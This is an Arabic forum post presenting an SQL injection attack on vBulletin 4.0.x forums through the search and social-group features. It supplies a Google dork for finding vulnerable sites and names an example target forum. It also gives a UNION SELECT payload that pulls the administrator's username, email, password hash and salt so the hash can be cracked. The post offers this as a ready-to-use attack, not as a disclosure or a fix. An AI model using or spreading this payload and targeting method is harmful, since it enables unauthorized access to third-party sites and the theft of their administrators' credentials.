السلام عليكم و رحمة الله و بركاته
بسم الله الرحمن الرحيم
إخواني اليوم جايبلكم ثغرة حقن لقواعد البيانات sql injection في منتديات vBulletin الجيل الرابع الإصدارات الأولى 4.0.x
الملف المصاب هو socialgroup.php و سكربت البحث searchtools.php
-----------------------------------------------
نجي للمهم
1- طريقة البحث في العم قوقل ضع هذا الدورك
كود PHP:
inurl:"search.php?search_type=1" intext:vbulletin 4
2-إستغلال الثغرة
ستجد الكثير من النتائج في قوقل ادخل على واحدة على سبيل المثال
http://forums.millennium.com/search.php?search_type=1
في منتصف الصفحة فوق خانة الكلمة التي سنبحث عنها اذهب إلى
"Search Multiple Content Types"
ثم ضح صح على خيار groups أو مجموعات
ثم ضع كلمة و ابحث
ثم الحقن يكون كالتالي
كود PHP:
UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
بعد الرابط و النتيجة
ستظهر لنا اليوزر و إيميل و باسوورد الأدمن مشفر و السالت أي نوع التشفير لأنه مهم لنستطيع فك التشفير
ملاحظة " النسخة 4.1.3 vBulletin لا تحوي هذه الثغرة
دمتم بود و السموحة على التقصير
